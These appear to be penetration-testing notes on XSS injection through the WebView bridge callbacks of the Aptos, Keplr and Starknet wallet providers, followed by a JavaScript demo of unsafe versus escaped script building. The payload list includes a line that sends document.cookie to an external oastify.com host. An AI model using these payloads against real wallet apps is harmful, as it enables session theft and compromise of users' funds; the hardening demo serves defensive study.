Target Vulnerabilities
APTOS:
• window.aptos.sendError(id, "error_message") - Line 33 in cFK.java
• window.aptos.sendResponse(id, JSON.stringify(data)) - Lines 61, 65 in cFK.java
OSMOSIS (Keplr):
• window.keplr.sendError(id, "error_message") - Line 30 in cFJ.java
• window.keplr.sendResponse(id, JSON.stringify(data)) - Lines 59, 63 in cFJ.java
STARKNET:
• window.starknet.sendError(id, "error_message") - Line 32 in cfY.java
• window.starknet.sendResponse(id, JSON.stringify(data)) - Line 60 in cfY.java
XSS Payloads
Basic XSS: ";alert('XSS');//
DOM Manipulation: ";document.body.innerHTML='HACKED';//
Data Exfiltration: ";fetch('http://r0sv7p79vx6xljkghjke5tnqfhl89zdn2.oastify.com/steal',{method:'POST',body:document.cookie});//
Console Log: ";console.log('XSS_EXECUTED');//
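Added example (not taken from the decompiled app or from this page): the weak and hardened ways of building the sendError script, run against a stub page with the "Console Log" payload listed above. It assumes the native code concatenates the message into a double-quoted JavaScript literal before handing the script to the WebView; the helper names and the id value 7 are hypothetical.

```javascript
// Added example. Helper names are hypothetical; the string-concatenation sink
// is an assumption about how the native side builds the call.

// Weak: the message is pasted into a double-quoted JS string literal.
function buildSendErrorUnsafe(provider, id, message) {
  return 'window.' + provider + '.sendError(' + id + ', "' + message + '")';
}

// Hardened: JSON.stringify emits a complete, escaped string literal.
// U+2028/U+2029 are escaped as well for engines older than ES2019.
function buildSendErrorSafe(provider, id, message) {
  if (!Number.isInteger(id)) throw new TypeError('id must be an integer');
  const literal = JSON.stringify(String(message))
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
  return 'window.' + provider + '.sendError(' + id + ', ' + literal + ')';
}

// Stand-in for the WebView: runs the script against stub objects and records
// what the callback received, any console call, and any parse/run failure.
function runInStubPage(provider, script) {
  const seen = { errors: [], consoleCalls: [], failure: null };
  const stubWindow = { [provider]: { sendError: (id, msg) => seen.errors.push([id, msg]) } };
  const stubConsole = { log: (...args) => seen.consoleCalls.push(args.join(' ')) };
  try {
    new Function('window', 'console', script)(stubWindow, stubConsole);
  } catch (e) {
    seen.failure = e.name;
  }
  return seen;
}

// The "Console Log" payload from the list above, unchanged.
const PAYLOAD = "\";console.log('XSS_EXECUTED');//";

function demo() {
  const results = {};
  for (const provider of ['aptos', 'keplr', 'starknet']) {
    results[provider] = {
      unsafe: runInStubPage(provider, buildSendErrorUnsafe(provider, 7, PAYLOAD)),
      safe: runInStubPage(provider, buildSendErrorSafe(provider, 7, PAYLOAD)),
    };
  }
  return results;
}

console.log(JSON.stringify(demo(), null, 2));
```

With the weak builder the quote in the message ends the literal early, so the script is no longer the single call the native code intended and the callback never receives the message; with the hardened builder the same bytes arrive as inert data. In Java on Android, org.json.JSONObject.quote(message) produces an equivalent quoted literal.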